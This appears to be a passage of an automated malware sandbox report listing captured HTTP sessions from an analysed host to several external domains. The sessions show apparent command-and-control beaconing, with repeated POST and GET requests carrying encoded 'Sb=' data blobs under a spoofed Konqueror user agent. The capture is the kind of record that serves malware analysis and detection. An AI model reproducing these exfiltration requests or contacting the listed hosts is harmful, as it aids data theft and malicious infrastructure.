33 45 38 73 65 5a 66 6c 35 35 45 48 43 78 54 35 62 74 78 6a 59 52 33 41 6f [TRUNCATED]
                                                                                        Data Ascii: Sb=aMSFOt46gPEmITzFbXPI0XVuxGy4imy3TvPFvR9KmxpoBj8CDOR1NiluhCV/helnojDV5vnRspfsKGcwBka583x1mQ7ZO6nCO5INGDzBxtFUa4yP8kUCSx0GjRsgJEbKQDoxgOFQ3ZePi5i/vgDV4eFYJvX/ZNBzMnnYpijj1DnWQkq1id2c7ot2VKeqFDdP7NPFwt8+NOrFYJFjdUu9W+JNzB7C4MeHZM8S215pHjJCSpGf9iyJdus23E2GIXch0z/0sMZIlHgv2Tu8AP4Wsd9uy8N/yDLPhA+oiKnfzWPc/G/Q+VhvcU3E8seZfl55EHCxT5btxjYR3AoSprl4bQVT2xQbxi9GxyzK2RGy6pjiO/9ncrJzRuYHSldu97MZHCa+0VuoUnltCG21ZF1GVXNfD0vIsT77eGkwT8VgRPPq8WETD8ue7pt6w3YrORVlt95goFVpHE6fysKUnHWhl10AHb4HO79tDKvS/gncqmxG17D/mhCM9RM95J2ZeTtVC3xInScEhKmUFbwK19ODQeqO3pojvf3KI29uY9IdJmkU+h9sGoMMk5+Uvhh9Km6rDKPo6RhTCazby2KpCsFr2IBZfVcRaBUAWUIfMLd6uyRTqBbtEOAge/6Ez8NMZmUoKoJu3yh99DtlLuFETMY5iDOZLayvRouQ7N1wVD54ONQuHSh96ltOlZLy+6rNHXWzVwrsNfbOgjC6M3ffi50mT3NDpD0Nlsv3elUa2rKQ4xsHymIMBVLNNNwMARHi5s0pNNepLdbmTBg742f32Ua896K0GDE48Uoaol2OVRUvjZWvYWigb9a7LLXSma1iCO0/zHl/PJF4Zx6UtNztkwy4uPtu49Qm0e+v/y0Ck+iNbPOQ6/Rwk4BRGj0NBVEfDkfRcrl6klYrSNhMXYjBSZNueeKTCT7psGBvtbE8zrd9I6H0UPx04tKCqMoHYbLGdg4T6xkJHjnEGw8CUI4aY63IUqLp5o0zlOLuCA7CvAqH7AAOob2k2 [TRUNCATED]
                                                                                        Dec 12, 2024 21:58:42.963211060 CET5235OUTData Raw: 2b 38 46 53 53 46 73 59 52 4a 43 53 59 4a 6f 75 73 2f 30 64 54 73 33 78 46 32 36 75 2f 48 65 64 76 6e 66 4e 78 78 79 44 78 7a 47 69 2b 6f 63 53 2b 32 35 2f 6a 44 56 6e 48 59 51 71 34 46 6a 42 31 6c 4b 43 78 39 64 48 44 6d 55 6a 46 53 59 43 4e 58
                                                                                        Data Ascii: +8FSSFsYRJCSYJous/0dTs3xF26u/HedvnfNxxyDxzGi+ocS+25/jDVnHYQq4FjB1lKCx9dHDmUjFSYCNXWCzlFP6hFSO7yPEzy2eSsz7Pfv6zaWe32YaAqma+BBl41kFyL7yHqwjD70dp/AZlaE5gvAG3Zi8rB/s9Rs0AVh1vzeL0f1lr7dBSQg/pdKEWkyV6cV4HU5Qs/5lvf+DCnx6lTKQt0dqIDTgNKEocau+Xco6xPooKL
                                                                                        Dec 12, 2024 21:58:43.294539928 CET1289INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:58:43 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fPFmB9TyUHDvEO3SsOWw2MxH17SLqb9DQSlrhW78cCYwmTtGhRbeiayXshP38wSwyYJb9a7kPsJiHqj4sCatiDgyUNPABMrIRTeTrL9ddtZr7xTLLqOlU%2BqVW4d8b%2Fb%2BZYLu"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f10a252ed3bbfa0-ATL
                                                                                        Content-Encoding: gzip
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=114262&min_rtt=114262&rtt_var=57131&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7813&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Raw: 32 36 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac d4 4f 6b 13 41 14 00 f0 fb 7e 8a 21 97 24 07 67 89 39 58 4c 13 51 cf 45 82 82 e7 c9 ee 4b 32 ed 76 66 33 33 9b 4d ea 06 3c 28 a6 7f d4 16 7a 50 69 c1 8a d0 1e 24 0a 12 2a 62 f4 cb b8 f9 73 f2 2b c8 6c 36 35 84 2d 86 d2 cb b2 fb de be 79 6f 7f 33 ec aa b4 04 75 15 52 6d 17 8a 29 05 2d 65 ae 93 26 99 46 53 25 03 21 84 6a dc 07 ab 4e 54 26 5b 88 9e ab 1e b3 14 e5 6c 2e 81 9e 44 19 84 9a 44 20 8f a0 22 62 a4 49 6b 44 71 81 3d 09 e2 6e 0d 98 2a cc bd 43 e5 63 a0 2d ca 50 11 79 04 53 66 43 eb 41 35 93 5e a3 96 e0 6b 20 25 b0 1a 88 74 16 95 d0 8d dc ac ce 34 d1 f0 cd e7 f0 67 ef f7 af 93 61 ff f5 f8 b4 1b be 3d 8b 73 b4 8a 32 b3 35 f5 34 3e 65 36 f7 b1 c3 2d a2 47 c5 75 01 55 54 44 e9 ba 52 ae bc 6d 9a 92 2a c0 d4 cd e5 57 b0 c5 37 4d df f7 f1 7a 5b d6 21 b7 82 2b de d6 56 ba a0 bb 4d 5b 8d cf bf 8e 07 9f e2 3e 1d 63 7a 5d 35 a7 44 25 63 75 29 c1 46 c3 71 1a 09 80 71 fc 0a 7e 51 e5 02 5f b9 7c 4f 70 5f 5e 22 57 2e 27 ab 45 2b fd 0f 6d 59 b3 72 f9 7a bc 3c 22 [TRUNCATED]
                                                                                        Data Ascii: 26eOkA~!$g9XLQEK2vf33M<(zPi$*bs+l65-yo3uRm)-e&FS%!jNT&[l.DD "bIkDq=n*Cc-PySfCA5^k %t4ga=s254>e6-GuUTDRm*W7Mz[!+VM[>cz]5D%cu)Fqq~Q_|Op_^"W.'E+mYrz<"6xE/K>ew/U[d\@K=7%$ 7\X9AV0[pj>T[;.C(lu &e
                                                                                        Dec 12, 2024 21:58:43.294559956 CET175INData Raw: a4 58 81 54 99 8b c6 59 3d a0 f6 dd de 1d 1e 7d 1f 1d 9e 0d bb e7 7f 7e ec 4d 5e bc 0c 7b ef c2 fd 83 b0 fb 25 4e 6d 77 47 83 83 f0 f8 e9 65 c4 a9 98 b8 0d 12 e7 b1 e5 70 cf ae 3a 44 00 75 23 ea bc 6d 46 7b 8c dd ba 7b 67 d1 3d 55 30 3a 08 1c 09
                                                                                        Data Ascii: XTY=}~M^{%NmwGep:Du#mF{{g=U0:aFauiF=Ir!y?nO0pbb0R#
                                                                                        Dec 12, 2024 21:58:43.294565916 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        69192.168.11.2049784172.67.131.14480
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:58:45.603945017 CET382OUTGET /1lpi/?Hsa=KVXAK1dJ22EyzD&Sb=XO6lNaUCtrQGcU2USTPm7AFH+ym41S/sd9ytkxpugSckEiM1CKodZjEVrjBa4PsrlwO68eKRpavYImQlE0qw0gJ/mieYbLr4KLMXJAig3t9gV+Ck/1h1VB8= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.jyshe18.buzz
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:58:45.912182093 CET1289INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:58:45 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vskf4lkCHeII0L%2B2FQp4QBUzM9ZlPEIp%2BfLNuJt%2FIiAxjKtjkUTY7kpqvSaFYNmfUcuUX74z4EDJ7K%2BOk74FhN6SK3JnqlLOKt9Dq6I%2BsG4gOk0Ihxkc%2B3sDp4eq2O%2Bq%2Fg7Q"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f10a2636a2553da-ATL
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=114177&min_rtt=114177&rtt_var=57088&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=382&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Raw: 35 63 62 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 67 6f 77 65 63 68 61 74 28 29 3b 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 6f 77 65 63 68 61 74 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 75 61 20 3d 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 3b 0a 20 20 20 20 20 20 76 61 72 20 69 73 57 65 69 78 69 6e 20 3d 20 75 61 2e 69 6e 64 65 78 4f 66 28 27 4d 69 63 72 6f 4d 65 73 73 65 6e 67 65 72 27 29 20 3e 20 2d 31 3b 0a 20 20 20 20 20 20 2f 2f 20 e6 98 af e5 be ae e4 bf a1 e6 b5 8f e8 a7 88 e5 99 a8 0a 20 20 20 20 20 20 69 66 20 28 69 73 57 65 69 78 69 6e 29 20 7b 0a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 68 74 74 70 73 3a 2f 2f 73 69 74 65 2e 69 70 31 33 38 2e 63 6f 6d 2f 77 77 77 2e 6a 79 73 68 65 31 38 2e 62 75 7a 7a 27 3b 20 2f 2f 20 e5 be ae e4 bf a1 e8 b7 b3 e8 bd ac 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 [TRUNCATED]
                                                                                        Data Ascii: 5cb<script type="text/javascript"> gowechat(); function gowechat() { var ua = navigator.userAgent; var isWeixin = ua.indexOf('MicroMessenger') > -1; // if (isWeixin) {window.location.href = 'https://site.ip138.com/www.jyshe18.buzz'; // } }</script><script type="text/javascript"> goqqllq(); function goqqllq() { var ua = navigator.userAgent; var isqqllq = ua.indexOf('QQ
                                                                                        Dec 12, 2024 21:58:45.912190914 CET1021INData Raw: 42 72 6f 77 73 65 72 27 29 20 3e 20 2d 31 3b 0a 20 20 20 20 20 20 2f 2f 20 e6 98 af 51 51 e6 b5 8f e8 a7 88 e5 99 a8 0a 20 20 20 20 20 20 69 66 20 28 69 73 71 71 6c 6c 71 29 20 7b 0a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20
                                                                                        Data Ascii: Browser') > -1; // QQ if (isqqllq) {window.location.href = 'http://site.ip138.com/www.jyshe18.buzz'; // QQ } }</script><script type="text/javascript"> goquark(); function goquark() { var
                                                                                        Dec 12, 2024 21:58:45.912195921 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        70192.168.11.2049785103.106.67.11280
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:58:51.087069035 CET644OUTPOST /86f0/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.furrcali.xyz
                                                                                        Origin: http://www.furrcali.xyz
                                                                                        Referer: http://www.furrcali.xyz/86f0/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 43 73 69 43 6e 68 6c 45 59 38 41 6c 2b 50 45 79 32 41 49 45 48 38 73 57 5a 56 59 42 66 42 78 74 6b 47 6b 75 52 72 49 72 6a 63 4b 55 4e 61 65 56 4b 71 61 33 51 6c 4f 58 74 79 38 30 6b 53 76 51 44 76 49 50 47 74 54 39 4b 5a 72 35 4a 4c 31 59 55 53 63 31 64 51 30 33 69 6e 75 66 48 57 52 50 5a 75 69 6a 4a 67 68 42 63 53 50 49 6a 61 41 57 6a 39 54 59 77 43 65 75 42 4a 48 38 63 4d 62 76 44 6b 77 35 41 75 4c 7a 4e 4f 38 68 4e 56 71 49 72 74 58 79 75 34 76 4e 37 79 6d 5a 51 6d 63 75 69 53 36 34 48 32 63 48 79 78 70 6c 5a 37 67 6e 30 6c 6d 52 6c 47 48 38 35 65 51 46 63 51 2b 50 57 51 3d 3d
                                                                                        Data Ascii: Sb=CsiCnhlEY8Al+PEy2AIEH8sWZVYBfBxtkGkuRrIrjcKUNaeVKqa3QlOXty80kSvQDvIPGtT9KZr5JL1YUSc1dQ03inufHWRPZuijJghBcSPIjaAWj9TYwCeuBJH8cMbvDkw5AuLzNO8hNVqIrtXyu4vN7ymZQmcuiS64H2cHyxplZ7gn0lmRlGH85eQFcQ+PWQ==
                                                                                        Dec 12, 2024 21:58:51.246778011 CET204INHTTP/1.1 404 Not Found
                                                                                        Server: Dynamic Http Server
                                                                                        X-Ratelimit-Limit: 101
                                                                                        X-Ratelimit-Remaining: 100
                                                                                        X-Ratelimit-Reset: 1
                                                                                        Date: Thu, 12 Dec 2024 20:58:51 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        71192.168.11.2049786103.106.67.11280
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:58:53.774487972 CET664OUTPOST /86f0/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.furrcali.xyz
                                                                                        Origin: http://www.furrcali.xyz
                                                                                        Referer: http://www.furrcali.xyz/86f0/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 43 73 69 43 6e 68 6c 45 59 38 41 6c 76 66 30 79 31 68 49 45 51 73 73 58 46 6c 59 42 47 52 78 70 6b 47 67 75 52 71 4d 37 6b 71 61 55 4e 2f 69 56 4c 76 75 33 63 46 4f 58 35 69 38 78 37 69 76 50 44 76 46 73 47 73 76 39 4b 5a 58 35 4a 4c 6c 59 55 6c 49 79 63 41 30 31 38 48 75 42 4e 32 52 50 5a 75 69 6a 4a 67 31 37 63 52 2f 49 6b 75 38 57 6a 63 54 62 7a 43 65 74 52 5a 48 38 4b 38 62 7a 44 6b 78 55 41 76 6e 4a 4e 4d 45 68 4e 55 61 49 72 34 6a 78 6c 34 76 4c 6d 69 6e 4d 65 33 4e 36 72 68 57 31 4c 47 59 6a 74 44 35 76 56 4e 74 39 70 58 53 31 6d 56 62 4f 39 75 70 74 65 53 2f 55 4c 52 38 5a 50 66 32 37 6b 74 53 4d 56 68 30 4a 4b 63 76 33 34 5a 67 3d
                                                                                        Data Ascii: Sb=CsiCnhlEY8Alvf0y1hIEQssXFlYBGRxpkGguRqM7kqaUN/iVLvu3cFOX5i8x7ivPDvFsGsv9KZX5JLlYUlIycA018HuBN2RPZuijJg17cR/Iku8WjcTbzCetRZH8K8bzDkxUAvnJNMEhNUaIr4jxl4vLminMe3N6rhW1LGYjtD5vVNt9pXS1mVbO9upteS/ULR8ZPf27ktSMVh0JKcv34Zg=
                                                                                        Dec 12, 2024 21:58:53.934149027 CET204INHTTP/1.1 404 Not Found
                                                                                        Server: Dynamic Http Server
                                                                                        X-Ratelimit-Limit: 101
                                                                                        X-Ratelimit-Remaining: 100
                                                                                        X-Ratelimit-Reset: 1
                                                                                        Date: Thu, 12 Dec 2024 20:58:53 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        72192.168.11.2049787103.106.67.11280
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:58:56.462896109 CET1289OUTPOST /86f0/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.furrcali.xyz
                                                                                        Origin: http://www.furrcali.xyz
                                                                                        Referer: http://www.furrcali.xyz/86f0/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 43 73 69 43 6e 68 6c 45 59 38 41 6c 76 66 30 79 31 68 49 45 51 73 73 58 46 6c 59 42 47 52 78 70 6b 47 67 75 52 71 4d 37 6b 71 53 55 4e 4e 61 56 4b 49 79 33 64 46 4f 58 36 69 38 77 37 69 76 47 44 73 31 77 47 73 6a 74 4b 66 54 35 4c 6f 64 59 44 45 49 79 46 51 30 31 30 6e 75 41 48 57 52 61 5a 75 79 6e 4a 67 6c 37 63 52 2f 49 6b 6f 59 57 6c 4e 54 62 2f 69 65 75 42 4a 47 7a 63 4d 62 58 44 6b 70 71 41 76 6a 6a 4e 64 6b 68 4e 30 4b 49 70 4b 37 78 35 6f 76 7a 6c 69 6d 50 65 33 42 4d 72 68 4c 4b 4c 47 73 5a 74 41 5a 76 46 49 77 77 31 46 4f 6f 6c 31 47 41 78 71 68 73 4a 55 7a 34 4e 43 45 69 46 70 32 73 75 59 72 64 4d 77 77 41 4f 63 57 6f 6b 2b 2f 63 45 77 47 36 32 6f 76 36 31 58 64 74 32 6b 76 6d 72 39 67 70 43 4d 72 75 41 41 2b 4b 61 38 6c 5a 33 36 73 75 68 42 34 48 44 77 48 66 72 51 46 68 34 46 69 6f 69 31 35 69 64 31 4f 54 62 33 51 56 39 4e 75 39 75 67 64 31 78 62 74 44 4e 52 6b 77 53 4e 51 49 38 4b 42 63 4c 6b 57 51 42 31 6c 4a 76 70 72 6a 4a 33 30 72 6c 71 4f 56 38 58 46 33 79 55 58 6d 42 38 37 [TRUNCATED]
                                                                                        Data Ascii: Sb=CsiCnhlEY8Alvf0y1hIEQssXFlYBGRxpkGguRqM7kqSUNNaVKIy3dFOX6i8w7ivGDs1wGsjtKfT5LodYDEIyFQ010nuAHWRaZuynJgl7cR/IkoYWlNTb/ieuBJGzcMbXDkpqAvjjNdkhN0KIpK7x5ovzlimPe3BMrhLKLGsZtAZvFIww1FOol1GAxqhsJUz4NCEiFp2suYrdMwwAOcWok+/cEwG62ov61Xdt2kvmr9gpCMruAA+Ka8lZ36suhB4HDwHfrQFh4Fioi15id1OTb3QV9Nu9ugd1xbtDNRkwSNQI8KBcLkWQB1lJvprjJ30rlqOV8XF3yUXmB874CSqyonkKLtogMUei1XQl2a4BXPikLXWHhOLBNpbNQ6gXfgv/Tc9gPT5rgT9R392TmUJfvc0Y/wJZLjdVg9O7z6cNi4EhCK8D9HRx0XYAJqouxUo8s+1PIbziyp9j36RiY9VMiBMQ0NYSxkHNTpQRFW0UsHE9Oh9hZ7EF+GvvX8OOltNurDPs+9K2sWcAAeMt/kJBe9ghPIQGeB+EZSGVxfnc+WsaYPhE0TE3NcwQ7+HLM+zMBVrDaVTKtne/I/JxPCz8ta2ckVQhi6m7/L5DzhY0t5la40ZFt8g9/ZOwQYgbZhBqhsB8uCsdXv89Lezhyndv9/xra9CH7bni21h3xQLmL+X3dEo0TDaLTY/q9TFAnl5HF9qd4F+mw2UCQlKUl/Oa5v1JSUomDe13GDonhnbUI02r7f7GVdIblH+6rxoJ1V+6ojp7aMspAXu/1ZHO8+A7gOP6Tgn0pe4hVWBvJglC/XoZy/LkZLki7T8cS963pieh6A15NLmH
                                                                                        Dec 12, 2024 21:58:56.462955952 CET6524OUTData Raw: 6d 5a 6b 77 4e 75 4f 44 4b 64 48 42 63 7a 52 2b 68 42 35 68 49 35 37 70 64 2f 5a 48 77 33 51 6b 39 75 50 69 35 55 58 45 4c 68 47 63 64 79 78 55 2b 2f 34 56 72 42 58 50 62 2f 69 67 68 2f 50 31 64 73 32 63 68 63 4a 4a 56 58 6c 51 4e 68 6d 4b 73 78
                                                                                        Data Ascii: mZkwNuODKdHBczR+hB5hI57pd/ZHw3Qk9uPi5UXELhGcdyxU+/4VrBXPb/igh/P1ds2chcJJVXlQNhmKsxKbE3sZh6NyPuua3fD1Xg6LIGB1lyaJfCsdkzg9z17uz0vxzBzSBgpoFO38o1Os9S54RGVu40QjKm+YuZkvVCKGdq+b8krVpqp4ZRJiKXlmC54xezt+O1hA/9tqfmLKkMuhQT9zh9iMmiR8VDpy/pF0L1/284pO5SF
                                                                                        Dec 12, 2024 21:58:56.624205112 CET204INHTTP/1.1 404 Not Found
                                                                                        Server: Dynamic Http Server
                                                                                        X-Ratelimit-Limit: 101
                                                                                        X-Ratelimit-Remaining: 100
                                                                                        X-Ratelimit-Reset: 1
                                                                                        Date: Thu, 12 Dec 2024 20:58:56 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        73192.168.11.2049788103.106.67.11280
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:58:59.143593073 CET382OUTGET /86f0/?Sb=PuKikXorY4oo6Pd4yxwUW5NofTFUIXhFjDlOX4M2s/L5J9SfDLPGQlnn7RwJ6yyFAuMFatCqAdXGLq9bXHIsbHEK0zn8CXVXTea1ExwfCjX9qoJAsvLL/QI=&Hsa=KVXAK1dJ22EyzD HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.furrcali.xyz
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:58:59.303318024 CET204INHTTP/1.1 404 Not Found
                                                                                        Server: Dynamic Http Server
                                                                                        X-Ratelimit-Limit: 101
                                                                                        X-Ratelimit-Remaining: 100
                                                                                        X-Ratelimit-Reset: 1
                                                                                        Date: Thu, 12 Dec 2024 20:58:59 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        74192.168.11.2049789199.59.243.22780
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:59:04.448617935 CET656OUTPOST /f9au/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.activeusers.tech
                                                                                        Origin: http://www.activeusers.tech
                                                                                        Referer: http://www.activeusers.tech/f9au/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 64 54 46 76 5a 32 56 50 6e 59 69 52 6f 58 63 77 78 56 43 61 6b 4a 73 69 73 65 59 57 47 47 6b 2f 70 33 32 43 78 74 71 78 55 65 33 30 56 59 42 6c 39 63 73 75 39 72 46 50 59 72 77 66 4c 37 46 4a 4c 30 39 31 7a 51 34 6a 6a 4c 36 6f 78 45 58 36 71 6b 31 6a 67 69 74 39 51 6a 59 33 62 42 6a 37 6c 56 56 6c 69 2f 38 54 77 6a 64 44 57 77 68 2f 4d 4b 64 56 66 67 4e 6a 41 61 4d 6b 38 45 56 35 52 68 66 63 62 66 53 7a 62 67 61 75 76 57 6e 61 6b 67 39 48 4d 71 31 73 31 51 53 6d 71 6f 71 74 2b 76 38 58 38 72 2f 4e 30 43 31 34 68 68 6b 59 53 65 44 46 68 61 43 6c 73 6c 34 62 66 38 39 53 6f 51 3d 3d
                                                                                        Data Ascii: Sb=dTFvZ2VPnYiRoXcwxVCakJsiseYWGGk/p32CxtqxUe30VYBl9csu9rFPYrwfL7FJL091zQ4jjL6oxEX6qk1jgit9QjY3bBj7lVVli/8TwjdDWwh/MKdVfgNjAaMk8EV5RhfcbfSzbgauvWnakg9HMq1s1QSmqoqt+v8X8r/N0C14hhkYSeDFhaClsl4bf89SoQ==
                                                                                        Dec 12, 2024 21:59:04.580002069 CET1289INHTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:59:03 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1134
                                                                                        x-request-id: 11a9c837-b12d-4e4d-9b6f-03c6cf3d9d84
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_R/fR5qQWR1xDptT+DmYSSYR/2VJQ+VUI2409f40OoSTAAe3fXzVlaIhXcxlVus7LuSE9VVwXJuXSYnMM5AVaaw==
                                                                                        set-cookie: parking_session=11a9c837-b12d-4e4d-9b6f-03c6cf3d9d84; expires=Thu, 12 Dec 2024 21:14:04 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 52 2f 66 52 35 71 51 57 52 31 78 44 70 74 54 2b 44 6d 59 53 53 59 52 2f 32 56 4a 51 2b 56 55 49 32 34 30 39 66 34 30 4f 6f 53 54 41 41 65 33 66 58 7a 56 6c 61 49 68 58 63 78 6c 56 75 73 37 4c 75 53 45 39 56 56 77 58 4a 75 58 53 59 6e 4d 4d 35 41 56 61 61 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_R/fR5qQWR1xDptT+DmYSSYR/2VJQ+VUI2409f40OoSTAAe3fXzVlaIhXcxlVus7LuSE9VVwXJuXSYnMM5AVaaw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
